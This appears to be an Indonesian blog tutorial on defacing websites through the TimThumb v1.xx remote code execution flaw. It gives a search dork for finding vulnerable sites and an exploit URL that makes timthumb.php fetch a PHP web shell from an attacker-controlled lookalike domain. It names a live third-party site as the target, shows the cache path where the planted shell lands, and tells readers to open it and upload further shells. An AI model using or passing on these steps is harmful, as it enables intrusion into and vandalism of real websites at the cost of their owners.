Cara deface dengan Exploit Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat.

Komentar

Postingan populer dari blog ini

Deface Poc CBT

Deface Dengan Dorking Shell Backdoor

TUTORIAL DEFACE POC DNS HIJACKING